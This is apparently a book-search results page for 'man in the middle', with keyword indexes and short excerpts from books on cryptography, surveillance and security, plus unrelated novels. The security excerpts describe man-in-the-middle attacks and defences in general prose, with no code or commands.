When Alice sends a message to Bob, Eve intercepts it, decrypts it, re-encrypts it, and sends it on to Bob. When Bob sends a message to Alice, Eve performs a similar procedure. This is a powerful attack. Of course, good protocol designers take these attacks into account and try to prevent them. Better communications protocols don’t permit man-in-the-middle attacks, and certainly don’t allow eavesdropping of passwords. Better electronic commerce protocols don’t allow malicious users to arbitrarily add cash to smart cards. But people make mistakes, and lots of protocols have problems. And again, it’s not always apparent what kinds of attacks need to be prevented.
Mastering Blockchain, Second Edition by Imran Bashir
3D printing, altcoin, augmented reality, autonomous vehicles, bitcoin, blockchain, business logic, business process, carbon footprint, centralized clearinghouse, cloud computing, connected car, cryptocurrency, data acquisition, Debian, disintermediation, disruptive innovation, distributed ledger, Dogecoin, domain-specific language, en.wikipedia.org, Ethereum, ethereum blockchain, fault tolerance, fiat currency, Firefox, full stack developer, general-purpose programming language, gravity well, information security, initial coin offering, interest rate swap, Internet of things, litecoin, loose coupling, machine readable, MITM: man-in-the-middle, MVC pattern, Network effects, new economy, node package manager, Oculus Rift, peer-to-peer, platform as a service, prediction markets, QR code, RAND corporation, Real Time Gross Settlement, reversible computing, RFC: Request For Comment, RFID, ride hailing / ride sharing, Satoshi Nakamoto, seminal paper, single page application, smart cities, smart contracts, smart grid, smart meter, supply-chain management, transaction costs, Turing complete, Turing machine, Vitalik Buterin, web application, x509 certificate
This protocol uses X.509 certificates for authentication and runs over HTTP and HTTPS. There are three messages in this protocol: PaymentRequest, Payment, and PaymentACK. The key features of this proposal are defense against man-in-the-middle attacks and secure proof of payment. Man-in-the-middle attacks can result in a scenario where the attacker is sitting between the merchant and the buyer and it would seem to the buyer that they are talking to the merchant, but in fact, the man in the middle is interacting with the buyer instead of the merchant. This can result in manipulation of the merchant's Bitcoin address to defraud the buyer. Several other BIPs, such as BIP 71 (Payment Protocol MIME types) and BIP 72 (URI extensions for Payment Protocol), have also been implemented to standardize the payment scheme to support BIP 70 (Payment Protocol).
Dark Mirror: Edward Snowden and the Surveillance State by Barton Gellman
4chan, A Declaration of the Independence of Cyberspace, Aaron Swartz, active measures, air gap, Anton Chekhov, Big Tech, bitcoin, Cass Sunstein, Citizen Lab, cloud computing, corporate governance, crowdsourcing, data acquisition, data science, Debian, desegregation, Donald Trump, Edward Snowden, end-to-end encryption, evil maid attack, financial independence, Firefox, GnuPG, Google Hangouts, housing justice, informal economy, information security, Jacob Appelbaum, job automation, John Perry Barlow, Julian Assange, Ken Thompson, Laura Poitras, MITM: man-in-the-middle, national security letter, off-the-grid, operational security, planetary scale, private military company, ransomware, Reflections on Trusting Trust, Robert Gordon, Robert Hanssen: Double agent, rolodex, Ronald Reagan, Saturday Night Live, seminal paper, Seymour Hersh, Silicon Valley, Skype, social graph, standardized shipping container, Steven Levy, TED Talk, telepresence, the long tail, undersea cable, Wayback Machine, web of trust, WikiLeaks, zero day, Zimmermann PGP
By agreement, with few exceptions, the NSA also restrains itself from clandestine surveillance in Canada, the United Kingdom, Australia, and New Zealand—the other four members of the Five Eyes intelligence partnership. Undisclosed operations inside other allied countries are regarded as risky but not out of bounds. man in the middle: In a man-in-the-middle attack, the NSA places or takes control of equipment directly in the path of digital traffic from one server to another. This enables the agency to read—and alter, for example by injecting malware—the data flow between source and destination. man on the side: A man-on-the-side attack gives the NSA access to but not control of equipment, such as a router or switch, that stands between the source and destination of digital traffic.
…
Overseas, where domestic legal restrictions do not apply, the acquisitions directorate, S3, is free to tunnel just about anywhere it likes. A worldwide hacking infrastructure called QUANTUM deploys a broad range of tools to inject software exploits, intercept communications with methods known as man in the middle and man on the side, and reroute calls and emails through NSA collection points. Most of these are known as passive operations because they collect electronic signals automatically as they pass through large trunk lines and junctions. When passive methods do not suffice, the job becomes, in NSA parlance, interactive.
Python Requests Essentials by Rakesh Vidya Chandra, Bala Subrahmanyam Varanasi
business logic, create, read, update, delete, en.wikipedia.org, Kickstarter, machine readable, MITM: man-in-the-middle, MVC pattern, natural language processing, RFC: Request For Comment, RFID, supply-chain management, web application
The cracking of the password hashes becomes difficult in digest authentication with the use of a nonce, which counters the chosen plain text attacks. Even though Digest authentication overcomes most of the drawbacks of Basic authentication, it does have some disadvantages. This scheme of authentication is vulnerable to man-in-the-middle attacks. It reduces the flexibility of storing the password in the password's database, as all the well-designed password databases use other encryption methods to store them. Using Digest authentication with Requests: Using Digest authentication with requests is very simple.
Consent of the Networked: The Worldwide Struggle for Internet Freedom by Rebecca MacKinnon
A Declaration of the Independence of Cyberspace, Bay Area Rapid Transit, Berlin Wall, blood diamond, business cycle, business intelligence, Cass Sunstein, Chelsea Manning, citizen journalism, Citizen Lab, cloud computing, cognitive dissonance, collective bargaining, conceptual framework, corporate social responsibility, Deng Xiaoping, digital divide, digital Maoism, don't be evil, Eben Moglen, Evgeny Morozov, Filter Bubble, Firefox, future of journalism, Global Witness, high-speed rail, illegal immigration, Jaron Lanier, Jeff Bezos, John Markoff, John Perry Barlow, Joi Ito, Julian Assange, Mark Zuckerberg, Mikhail Gorbachev, MITM: man-in-the-middle, national security letter, online collectivism, Panopticon Jeremy Bentham, Parag Khanna, pre–internet, race to the bottom, real-name policy, Richard Stallman, Ronald Reagan, sharing economy, Silicon Valley, Silicon Valley startup, Skype, Steve Crocker, Steven Levy, Tactical Technology Collective, technological determinism, WikiLeaks, Yochai Benkler
Bizarrely, in late February as political tensions mounted, the government suddenly unblocked social media websites such as Facebook, Blogspot, and YouTube for the first time since 2007. The reasons soon became clear: soon after the ban was lifted, government hackers launched what is known technically as a “man in the middle” attack on Syrian Facebook users, inserting a false “security certificate” onto people’s browsers when they tried to log into their Facebook accounts through the secure “https” version of the site. This attack enabled government hackers to take over activists’ accounts and gain access to their entire network of contacts.
…
Meanwhile, Ali Abdulemam—still in hiding—was sentenced in absentia to fifteen years in prison: Leila Nachawati, “Bahrain: Leading Blogger Ali Abdulemam Sentenced to 15 Years in Prison, Along with Other Human Rights Defenders,” Global Voices Advocacy, June 22, 2011, http://advocacy.globalvoicesonline.org/2011/06/22/bahrain-leading-blogger-ali-abdulemam-sentenced-to-15-years-in-prison-along-with-other-human-rights-defenders (all accessed June 27, 2011). 63 statement by King Hamad bin Isa Al Khalifa: “His Majesty Stresses the Key to Reform Is Through Press Freedom,” Bahrain News Agency, May 3, 2011, www.bna.bh/portal/en/news/455101 (accessed August 11, 2011). 64 In Syria, where between March and July 2011 an estimated 1,400 people were killed and at least 15,000 detained: See Neil MacFarquhar and Rick Gladstone, “Outside Pressure Builds on Syria,” New York Times, August 2, 2011, www.nytimes.com/2011/08/03/world/middleeast/03syria.html; and “Syria: Mass Arrest Campaign Intensifies,” Human Rights Watch, July 20, 2011, www.hrw.org/news/2011/07/20/syria-mass-arrest-campaign-intensifies (all accessed August 2, 2011). 64 “man in the middle” attack on Syrian Facebook users: See Anas Qtiesh, “Did Syria Replace Facebook’s Security Certificate with a Forged One?” Global Voices Advocacy, May 4, 2011, http://advocacy.globalvoicesonline.org/2011/05/05/did-syria-replace-facebooks-security-certificate-with-a-forged-one; and Leila Nachawati, “Syrian Uprisings and Official vs.
The Architecture of Open Source Applications by Amy Brown, Greg Wilson
8-hour work day, anti-pattern, bioinformatics, business logic, c2.com, cloud computing, cognitive load, collaborative editing, combinatorial explosion, computer vision, continuous integration, Conway's law, create, read, update, delete, David Heinemeier Hansson, Debian, domain-specific language, Donald Knuth, en.wikipedia.org, fault tolerance, finite state, Firefox, Free Software Foundation, friendly fire, functional programming, Guido van Rossum, Ken Thompson, linked data, load shedding, locality of reference, loose coupling, Mars Rover, MITM: man-in-the-middle, MVC pattern, One Laptop per Child (OLPC), peer-to-peer, Perl 6, premature optimization, recommendation engine, revision control, Ruby on Rails, side project, Skype, slashdot, social web, speech recognition, the scientific method, The Wisdom of Crowds, web application, WebSocket
Some of the possible threats include:
- the central index may be compromised
- the mirrors might be tampered with
- a man-in-the-middle attack between the central index and the end user, or between a mirror and the end user
To detect the first attack, package authors need to sign their packages using PGP keys, so that users can verify that the package comes from the author they trust. The mirroring protocol itself only addresses the second threat, though some attempt is made to detect man-in-the-middle attacks. The central index provides a DSA key at the URL /serverkey, in the PEM format as generated by openssl dsa -pubout.
…
Verification is not needed when downloading from the central index, and clients should not do it, to reduce the computation overhead. About once a year, the key will be replaced with a new one. Mirrors will have to re-fetch all /serversig pages. Clients using mirrors need to find a trusted copy of the new server key. One way to obtain one is to download it from https://pypi.python.org/serverkey. To detect man-in-the-middle attacks, clients need to verify the SSL server certificate, which will be signed by the CACert authority. 14.5. Implementation Details: The implementation of most of the improvements described in the previous section is taking place in Distutils2. The setup.py file is not used anymore, and a project is completely described in setup.cfg, a static .ini-like file.
Atrocity Archives by Stross, Charles
airport security, anthropic principle, Berlin Wall, Bletchley Park, brain emulation, British Empire, Buckminster Fuller, defense in depth, disinformation, disintermediation, experimental subject, glass ceiling, haute cuisine, hypertext link, Khyber Pass, luminiferous ether, mandelbrot fractal, Menlo Park, MITM: man-in-the-middle, Neal Stephenson, NP-complete, PalmPilot, pneumatic tube, Snow Crash, Strategic Defense Initiative, the medium is the message, Y2K, yield curve
"Er, I was attending a training course: Introduction to Applied Occult Computing 104, conducted by Dr. Vohlman." The balding man in the middle makes a doodle on his pad then fixes me with a cold stare. "Your opinion of the course?" "My--er?" I freeze for a moment; this isn't in the script. "I was bored silly--um, the course was fine, but it was a bit basic. I was only there because Harriet was pissed off at me for coming in late after putting in a twenty-hour shift. Dr. Vohlman did a good job, but really it was insanely basic and I didn't learn anything new and wasn't paying much attention--" Why am I saying this? The man in the middle looks at me again. It's like being under a microscope; I feel the back of my neck burst out in a cold, prickly sweat.
Culture & Empire: Digital Revolution by Pieter Hintjens
4chan, Aaron Swartz, airport security, AltaVista, anti-communist, anti-pattern, barriers to entry, Bill Duvall, bitcoin, blockchain, Boeing 747, bread and circuses, business climate, business intelligence, business process, Chelsea Manning, clean water, commoditize, congestion charging, Corn Laws, correlation does not imply causation, cryptocurrency, Debian, decentralized internet, disinformation, Edward Snowden, failed state, financial independence, Firefox, full text search, gamification, German hyperinflation, global village, GnuPG, Google Chrome, greed is good, Hernando de Soto, hiring and firing, independent contractor, informal economy, intangible asset, invisible hand, it's over 9,000, James Watt: steam engine, Jeff Rulifson, Julian Assange, Kickstarter, Laura Poitras, M-Pesa, mass immigration, mass incarceration, mega-rich, military-industrial complex, MITM: man-in-the-middle, mutually assured destruction, Naomi Klein, national security letter, Nelson Mandela, new economy, New Urbanism, no silver bullet, Occupy movement, off-the-grid, offshore financial centre, packet switching, patent troll, peak oil, power law, pre–internet, private military company, race to the bottom, real-name policy, rent-seeking, reserve currency, RFC: Request For Comment, Richard Feynman, Richard Stallman, Ross Ulbricht, Russell Brand, Satoshi Nakamoto, security theater, selection bias, Skype, slashdot, software patent, spectrum auction, Steve Crocker, Steve Jobs, Steven Pinker, Stuxnet, The Wealth of Nations by Adam Smith, The Wisdom of Crowds, trade route, transaction costs, twin studies, union organizing, wealth creators, web application, WikiLeaks, Y2K, zero day, Zipf's Law
This gives us secrecy, thanks to the encryption, and also "authentication," which is the knowledge that the data really came from me, and not an impostor. There is little point in encryption if we can't be sure of the sender. There's a small catch: you also need to be sure that B is really my key, and was not switched by some "man in the middle," or MIM. For asymmetric keys to work at all well, those encryption keys must be exchanged securely, which creates an interesting Catch-22 that attackers exploit. The keys must also, and this is very important, be really random and unguessable. If you can guess the keys, the whole encryption exercise is for naught.
…
In 2013, any security product that isn't open source isn't credible. We're still not secure, however. Let's say we can generate really strong keys that no-one could ever guess, immune from rubber-hose attacks, and hard enough to crack that it would take a zillion years to try all combinations. It's still trivial to break such security, if I can do a man in the middle attack. A MIM attack takes advantage of the fact that even if we can create secure keys, we need some way to exchange them. It's like me sending the key to my house in the mail to a person coming to stay. An attacker can open the mail, take out my key, substitute his, with a letter containing an impostor address.
The Hacker and the State: Cyber Attacks and the New Normal of Geopolitics by Ben Buchanan
active measures, air gap, Bernie Sanders, bitcoin, blockchain, borderless world, Brian Krebs, British Empire, Cass Sunstein, citizen journalism, Citizen Lab, credit crunch, cryptocurrency, cuban missile crisis, data acquisition, disinformation, Donald Trump, drone strike, Edward Snowden, fake news, family office, Hacker News, hive mind, information security, Internet Archive, Jacob Appelbaum, John Markoff, John von Neumann, Julian Assange, Kevin Roose, Kickstarter, kremlinology, Laura Poitras, MITM: man-in-the-middle, Nate Silver, operational security, post-truth, profit motive, RAND corporation, ransomware, risk tolerance, Robert Hanssen: Double agent, rolodex, Ronald Reagan, Russian election interference, seminal paper, Silicon Valley, South China Sea, Steve Jobs, Stuxnet, subscription business, technoutopianism, undersea cable, uranium enrichment, Vladimir Vetrov: Farewell Dossier, Wargames Reagan, WikiLeaks, zero day
Even as the PLA generated new hop points, TAO had such good access and insight into the PLA’s efforts that it could identify the new computers fairly easily. But why stop there? Instead of observing from hop points and watching from the PLA’s internet provider, TAO could go further. The NSA’s hackers could, at long last, target the actual computers owned by the hackers in this part of the PLA. TAO employed something called a man-in-the-middle operation. This requires access to the target’s internet traffic, access that TAO’s hacking efforts had gained with their penetration of China’s hacking infrastructure. From this privileged vantage point, the NSA’s hackers could intercept and sometimes manipulate the PLA’s data as it moved from its source to its destination and back again. Using this access, TAO appears to have added some secret malicious code to the PLA’s normal internet traffic, hacking the computers from which the Chinese carried out their operations.
…
See also AT&T; corporations compellence, 168–169 competition, 5, 9 conventional operations, compared to cyber operations, 189 Conway, Kellyanne, 239 cookies, 35 corporate access: by China, 88; shaping and, 39; signaling and, 39 corporations: access to data from, combined with passive collection, 13–39; intelligence community and, 15–16, 64–85; laws compelling cooperation of, 25. See also AT&T; commercial partnerships Cosmos Cooperative Bank, 284–287 counterfeiting, 268–269, 270–271 counterintelligence, 108–125; ARROWECLIPSE, 112–113; detecting adversary’s hacking efforts against other targets, 116–120; fourth-party collection, 120–125; man-in-the-middle operations, 114–115; persistence / aggressiveness in, 116; proactive, 109–110, 112; Tailored Access Operations (TAO), 112–115, 117, 258; targeting hop points, 112–113; Territorial Dispute (TeDi) program, 117–118, 120; uncovering of new actors by, 118–120 counternarcotics, 32 covert action, 309 CRASHOVERRIDE, 197–201, 204, 205, 310 credentials, stolen, 38, 191–193; DNC employees’, 215; in election interference, 218–220; in North Korean campaign, 276; in second Ukraine blackout, 197.
Cybersecurity: What Everyone Needs to Know by P. W. Singer, Allan Friedman
4chan, A Declaration of the Independence of Cyberspace, air gap, Apple's 1984 Super Bowl advert, barriers to entry, Berlin Wall, bitcoin, blood diamond, borderless world, Brian Krebs, business continuity plan, Chelsea Manning, cloud computing, cognitive load, crowdsourcing, cuban missile crisis, data acquisition, do-ocracy, Dr. Strangelove, drone strike, Edward Snowden, energy security, failed state, fake news, Fall of the Berlin Wall, fault tolerance, Free Software Foundation, global supply chain, Google Earth, information security, Internet of things, invention of the telegraph, John Markoff, John Perry Barlow, Julian Assange, Khan Academy, M-Pesa, military-industrial complex, MITM: man-in-the-middle, mutually assured destruction, Network effects, packet switching, Peace of Westphalia, pre–internet, profit motive, RAND corporation, ransomware, RFC: Request For Comment, risk tolerance, rolodex, Seymour Hersh, Silicon Valley, Skype, smart grid, SQL injection, Steve Jobs, Stuxnet, Twitter Arab Spring, uranium enrichment, vertical integration, We are Anonymous. We are Legion, web application, WikiLeaks, Yochai Benkler, zero day, zero-sum game
Things got especially tricky once Stuxnet found its way into this target (it was later revealed that the delivery mechanism was infiltration through Iranian nuclear scientists’ own laptops and memory sticks). Langner discovered that the cyberattack didn’t shut down the centrifuges in any obvious manner. Instead, it ran a series of subroutines. One, known as a “man in the middle,” caused tiny adjustments in pressure inside the centrifuges. Another manipulated the speed of the centrifuges’ spinning rotors, causing them to alternately slow down and then speed back up, throwing the rotors out of whack and ruining their work. On top of this, every so often the malware would push the centrifuge speeds past the designed maximum.
…
But one man’s poor computer security turned out to have more significant consequences when the Israelis began to examine the files that the official had stored on the laptop’s hard drive, including pictures. One photo in particular caught the Israelis’ attention. It showed an Asian man in a blue tracksuit standing next to an Arab man in the middle of the Syrian desert. It could have been innocuous, but then Mossad identified the two men as Chon Chibu, a leader of the North Korean nuclear program, and Ibrahim Othman, director of the Syrian Atomic Energy Commission. Combined with other documents lifted from the hard drive, such as construction plans and photos of a type of pipe used for work on fissile materiel, the Israelis realized the laptop was an atomic alarm bell.
This Machine Kills Secrets: Julian Assange, the Cypherpunks, and Their Fight to Empower Whistleblowers by Andy Greenberg
air gap, Apple II, Ayatollah Khomeini, Berlin Wall, Bill Gates: Altair 8800, Bletchley Park, Burning Man, Chelsea Manning, computerized markets, crowdsourcing, cryptocurrency, disinformation, domain-specific language, driverless car, drone strike, en.wikipedia.org, Evgeny Morozov, Fairchild Semiconductor, fault tolerance, hive mind, information security, Jacob Appelbaum, John Gilmore, John Perry Barlow, Julian Assange, Lewis Mumford, Mahatma Gandhi, military-industrial complex, Mitch Kapor, MITM: man-in-the-middle, Mohammed Bouazizi, Mondo 2000, Neal Stephenson, nuclear winter, offshore financial centre, operational security, PalmPilot, pattern recognition, profit motive, Ralph Nader, real-name policy, reality distortion field, Richard Stallman, Robert Hanssen: Double agent, Silicon Valley, Silicon Valley ideology, Skype, social graph, SQL injection, statistical model, stem cell, Steve Jobs, Steve Wozniak, Steven Levy, Teledyne, three-masted sailing ship, undersea cable, Vernor Vinge, We are Anonymous. We are Legion, We are the 99%, WikiLeaks, X Prize, Zimmermann PGP
But there’s an inherent Achilles’ heel in that scheme: If Bob has never met Alice, how does Bob get Alice’s key securely? She has to send it to him somehow. But they can’t encrypt the message that carries the key—they come up against the same problem of how to send a key that decrypts that message. If Alice gives up and mails Bob an unencrypted key, on the other hand, any sinister man-in-the-middle could intercept it, copy it, send it on its way, and then decode all their future messages. Unless Alice and Bob have already met in some dark alley and shared their key, private key encryption is hardly private at all. (In fact, it’s called “private key encryption” precisely because the key must be kept private, which is what makes actually using it so tough.)
…
And it has the unique, almost magical property: What’s encrypted with that key can only be decrypted with Bob’s private key. Suddenly the conundrum of how Alice mails the private key to Bob disappears. Bob already has the private key, and he can send his public key—the key Alice needs to encrypt messages that only Bob can unlock—to Alice on a postcard from London to New York. The sinister man-in-the-middle can read that postcard all he likes. Not only that, Bob posts his public key on his website, prints it on his business card, and even adds it to the signature of his e-mail. In fact, Bob wants everyone to see the public key, because it’s used for harmlessly scrambling secrets, not unscrambling them.
Drown by Junot Diaz
New York, he said, carefully omitting the Nueva and the Yol. We ain’t going that far but you can ride with us to Trenton if you like. Where the hell you from pal? Miami. Miami. Miami’s kind of far from here. The other man looked at the driver. Are you a musician or something? Jes, Papi said. I play the accordion. That excited the man in the middle. Shit, my old man played the accordion but he was a Polack like me. I didn’t know you spiks played it too. What kind of polkas do you like? Polkas? Jesus, Will, the driver said. They don’t play polkas in Cuba. They drove on, slowing only to unfold their badges at the tolls. Papi sat still and listened to the man crying in the back.
Information Doesn't Want to Be Free: Laws for the Internet Age by Cory Doctorow, Amanda Palmer, Neil Gaiman
Airbnb, barriers to entry, Big Tech, Brewster Kahle, cloud computing, Dean Kamen, Edward Snowden, game design, general purpose technology, Internet Archive, John von Neumann, Kickstarter, Large Hadron Collider, machine readable, MITM: man-in-the-middle, optical character recognition, plutocrats, pre–internet, profit maximization, recommendation engine, rent-seeking, Saturday Night Live, Skype, Steve Jobs, Steve Wozniak, Stewart Brand, Streisand effect, technological determinism, transfer pricing, Whole Earth Catalog, winner-take-all economy
Criminals like to hack DNS servers to redirect requests like “www.citibank.com” to lookalike webpages that they operate, so that they can get your banking details and clean you out when you unsuspectingly type in your password. Oppressive governments like to redirect gmail.com and facebook.com to their own “man-in-the-middle” servers, so that they can snoop on citizens’ email and figure out whom to arrest. Lots of people are trying to solve the DNS problem. It is real, and grave. Many Internet-security experts consider the insecurity of DNS to represent an existential threat to the Internet itself, and there are many efforts under way, like DNSSEC, to add a layer of security to the service.
Rebel Code: Linux and the Open Source Revolution by Glyn Moody
barriers to entry, business logic, commoditize, Compatible Time-Sharing System, Debian, Dennis Ritchie, Donald Knuth, Eben Moglen, Free Software Foundation, ghettoisation, Guido van Rossum, history of Unix, hypertext link, Johann Wolfgang von Goethe, John Gilmore, Ken Thompson, Kickstarter, Larry Ellison, Larry Wall, Marc Andreessen, MITM: man-in-the-middle, Multics, Network effects, new economy, packet switching, RFC: Request For Comment, Richard Stallman, Silicon Valley, skunkworks, slashdot, SoftBank, Steve Ballmer, Steve Jobs, Steven Levy, the Cathedral and the Bazaar, thinkpad, VA Linux
A few hours after Linus’s final posting, Eric Raymond added his comments on the situation. People, these are the early-warning signs of potential burnout. Heed them and take warning. Linus’s stamina has been astonishing, but it’s not limitless. All of us (and yes, that means you too, Linus) need to cooperate to *reduce* the pressure on the critical man in the middle, rather than increasing it. He points out one central fact for the Linux development process: Linus is god until *he* says otherwise. Period. Flaming him doesn’t help, and isn’t fair—and you need to have been the key man in development of a must-never-fail piece of software before you even have standing to *think* about doing it.
…
In other words, Linus’s dropping patches too often was not just inconvenient but undermined the very mechanism that powered the open source development model. Raymond concludes with a warning couched in characteristically graphic and appropriate terms: These risks are bound to get worse over time because both system complexity and the developer pool are increasing. And the critical man in the middle—the “Jesus nut” in our helicopter—has a stress limit. We’re going to hit that limit someday. Maybe we’re pushing it now. He concludes: I’ve been worrying about this problem for months. (I’m our anthropologist, remember? It’s part of my *job* to notice how the social machinery works and where the failure modes are.)
Back to School: Why Everyone Deserves a Second Chance at Education by Mike Rose
blue-collar work, centre right, confounding variable, creative destruction, delayed gratification, digital divide, George Santayana, income inequality, MITM: man-in-the-middle, moral panic, new economy, Ronald Reagan, The Bell Curve by Richard Herrnstein and Charles Murray, the built environment, urban renewal, War on Poverty
We ourselves have to be more creative in fusing book and workshop for those who go to school to fashion a better life.
four: Who We Are: Portraits from an Urban Community College
I. Remedial English
“Forlorn,” the instructor, Mr. Quijada, asks, looking up from the essay the class is discussing. “What’s forlorn mean?” “Desire,” says the older man in the middle of the room—glasses, graying dreadlocks pulled back—then in the same breath adds “longing.” “Close, Leonard,” Mr. Quijada replies. “Longing can certainly lead to being forlorn.” Casually strategic, Mr. Quijada looks to the last row. “Kimberly, it’s good to see you back. Do you want to add to Leonard’s definition?”
Designing Web APIs: Building APIs That Developers Love by Brenda Jin, Saurabh Sahni, Amir Shevat
active measures, Amazon Web Services, augmented reality, Big Tech, blockchain, business logic, business process, cognitive load, continuous integration, create, read, update, delete, exponential backoff, Google Hangouts, if you build it, they will come, Lyft, machine readable, MITM: man-in-the-middle, premature optimization, pull request, Salesforce, Silicon Valley, Snapchat, software as a service, the market place, uber lyft, web application, WebSocket
OAuth scopes for sensitive information
Protect sensitive information on your service by using dedicated OAuth scopes. This way, your users will not grant access to sensitive information to every application that might not need it.
HTTPS endpoints
Because access tokens are sent as part of every HTTP request, it’s important that your API endpoints require HTTPS. This prevents man-in-the-middle attacks.
Verify redirect URL
When the optional redirect URL is provided during an authorization request, ensure that it matches one of the registered URLs for the application. If not, the API server must show an error without showing the authorization prompt. This ensures that any returned secrets are not exposed to an attacker.
An Elegant Puzzle: Systems of Engineering Management by Will Larson
Ben Horowitz, Cass Sunstein, Clayton Christensen, data science, DevOps, en.wikipedia.org, fault tolerance, functional programming, Google Earth, hive mind, Innovator's Dilemma, iterative process, Kanban, Kickstarter, Kubernetes, loose coupling, microservices, MITM: man-in-the-middle, no silver bullet, pull request, Richard Thaler, seminal paper, Sheryl Sandberg, Silicon Valley, statistical model, systems thinking, the long tail, web application
“Security Keys: Practical Cryptographic Second Factors for the Modern Web” Security keys like the YubiKey18 have emerged as the most secure second authentication factor, and this paper out of Google explains the motivations that led to their creation, as well as the design that makes them work. From the abstract: Security Keys are second-factor devices that protect users against phishing and man-in-the-middle attacks. Users carry a single device and can self-register it with any online service that supports the protocol. The devices are simple to implement and deploy, simple to use, privacy preserving, and secure against strong attackers. We have shipped support for Security Keys in the Chrome web browser and in Google’s online services.
The Snowden Files: The Inside Story of the World's Most Wanted Man by Luke Harding
affirmative action, air gap, airport security, Anton Chekhov, Apple's 1984 Super Bowl advert, Berlin Wall, Big Tech, Bletchley Park, Chelsea Manning, disinformation, don't be evil, drone strike, Edward Snowden, Etonian, Firefox, Google Earth, information security, Jacob Appelbaum, job-hopping, Julian Assange, Khan Academy, kremlinology, Laura Poitras, Mark Zuckerberg, Maui Hawaii, MITM: man-in-the-middle, national security letter, operational security, Panopticon Jeremy Bentham, pre–internet, Ralph Waldo Emerson, rolodex, Rubik’s Cube, Silicon Valley, Skype, social graph, Steve Jobs, TechCrunch disrupt, undersea cable, web application, WikiLeaks
This mystery correspondent had an unusual request: he asked Greenwald to install PGP encryption software on to his laptop. Once up and running, it allows two parties to carry out an encrypted online chat. If used correctly, PGP guarantees privacy (the initials stand for ‘Pretty Good Privacy’); it prevents a man-in-the-middle attack by a third party. The source didn’t explain why this curious measure was needed. Greenwald had no objections – he had been meaning for some time to set up a tool widely employed by investigative journalists, by WikiLeaks and by others suspicious of government snooping. But there were two problems.
Ansible for DevOps: Server and Configuration Management for Humans by Jeff Geerling
Abraham Maslow, AGPL, Amazon Web Services, cloud computing, continuous integration, database schema, Debian, defense in depth, DevOps, fault tolerance, Firefox, full text search, Google Chrome, inventory management, loose coupling, microservices, Minecraft, MITM: man-in-the-middle, punch-card reader, Ruby on Rails, web application
Look at each of the hops between you and Google’s CDN. Do you know who controls each of the devices between your computer and Google? Do you trust these operators with all of your personal or corporate secrets? Probably not. Each of these connection points—and each network device and cable connecting them—is a weak point exposing you to a man-in-the-middle attack. Strong encryption is needed between your computer and the destination if you want to ensure data security.
rlogin, rsh and rcp
rlogin was introduced in BSD 4.2 in 1983, and has been distributed with many UNIX-like systems alongside Telnet until recently. rlogin was used widely during the 80s and much of the 90s.
The Minor Adjustment Beauty Salon: No. 1 Ladies' Detective Agency by Alexander McCall Smith
MITM: man-in-the-middle, Sheryl Sandberg
At one level the answer was simple—he had never vacuumed the house—but there was an even more profound issue to be resolved: Did they even have a vacuum cleaner? If there was no vacuum cleaner, then it would look less bad for him that he had never used one in the house. Mind you, he had never swept the house either—and they did have a broom. A forest of hands went up, but it did not include his. Keitumeste pointed at a man in the middle. “Yes, Rra? When did you do that?” The man answered in a clear, confident voice. “Yesterday, Mma. I vacuumed the living room and the dining room, too. I would have done more if I had not been so tired.” Keitumeste nodded. “And what sort of vacuum cleaner is it, Rra?” The question, so innocently put, found its target.
I Hate the Internet: A Novel by Jarett Kobek
Alan Greenspan, Anne Wojcicki, Blue Ocean Strategy, Burning Man, disruptive innovation, do what you love, driverless car, East Village, Edward Snowden, gentrification, Golden Gate Park, Google bus, Google Glasses, Google X / Alphabet X, immigration reform, indoor plumbing, informal economy, Jeff Bezos, Larry Ellison, liberation theology, low interest rates, Mark Zuckerberg, microaggression, MITM: man-in-the-middle, Norman Mailer, nuclear winter, packet switching, PageRank, Peter Thiel, public intellectual, quantitative easing, Ray Kurzweil, rent control, Ronald Reagan, Sheryl Sandberg, Silicon Valley, Snow Crash, Steve Jobs, Susan Wojcicki, tech worker, TechCrunch disrupt, technological singularity, Triangle Shirtwaist Factory, union organizing, V2 rocket, Vernor Vinge, vertical integration, wage slave, Whole Earth Catalog
Dennis formed Fear and Respect with a capital seed of $100,000,000. The money was a graduation present from his father. For over three decades, the old man, His Royal Highness Fatih bin Muhammad bin Abdulaziz al Saud, had run his own company. He’d built it into a powerhouse and made himself the third richest man in the Middle East. One of Fatih bin Muhammad’s few failures came during the dotcom era of the 1990s, when he’d lost a lot of money on bad investments. The most notorious was Kozmo.com. Kozmo.com was a one-hour delivery service that sold goods below cost and hoped to make up the money on delivery fees. The hysteria of the moment was such that even with a business model dedicated to losing money, the company raised about $250,000,000 in capital.
Only Americans Burn in Hell by Jarett Kobek
"hyperreality Baudrillard"~20 OR "Baudrillard hyperreality", AltaVista, coherent worldview, corporate governance, crony capitalism, Donald Trump, East Village, General Magic , ghettoisation, Google Chrome, Great Leap Forward, haute couture, illegal immigration, indoor plumbing, Jeff Bezos, mandelbrot fractal, microdosing, military-industrial complex, MITM: man-in-the-middle, pre–internet, sexual politics, Seymour Hersh, Skype, Snapchat, Steve Bannon, Steve Jobs, Telecommunications Act of 1996
If people require safe spaces, then I see nothing wrong with providing them, as long as the institution tempers their presence with a robust environment of educational rigor.” When the questions were over, pleasantries were exchanged. HRH texted his manservant Dmitri Huda. “HEY NONNY HEY, ARE THINGS IN ORDER?????” asked HRH. “Yes, Dennis,” texted Dmitri Huda. “I’m downstairs.” HRH’s father Fatih bin Muhammad bin Abdulaziz Al Saud was the second-richest man in the Middle East. He built a fortune after being exiled from the Kingdom. This exile followed the parking-lot execution of Misha’al bint Fahd bin Muhammad bin Abdulaziz Al Saud. Fatih bin Muhammad was a convenient scapegoat for the assassination. It was said that he encouraged delusions of romance in Misha’al.
Building Secure and Reliable Systems: Best Practices for Designing, Implementing, and Maintaining Systems by Heather Adkins, Betsy Beyer, Paul Blankinship, Ana Oprea, Piotr Lewandowski, Adam Stubblefield
air gap, anti-pattern, barriers to entry, bash_history, behavioural economics, business continuity plan, business logic, business process, Cass Sunstein, cloud computing, cognitive load, continuous integration, correlation does not imply causation, create, read, update, delete, cryptocurrency, cyber-physical system, database schema, Debian, defense in depth, DevOps, Edward Snowden, end-to-end encryption, exponential backoff, fault tolerance, fear of failure, general-purpose programming language, Google Chrome, if you see hoof prints, think horses—not zebras, information security, Internet of things, Kubernetes, load shedding, margin call, microservices, MITM: man-in-the-middle, NSO Group, nudge theory, operational security, performance metric, pull request, ransomware, reproducible builds, revision control, Richard Thaler, risk tolerance, self-driving car, single source of truth, Skype, slashdot, software as a service, source of truth, SQL injection, Stuxnet, the long tail, Turing test, undersea cable, uranium enrichment, Valgrind, web application, Y2K, zero day
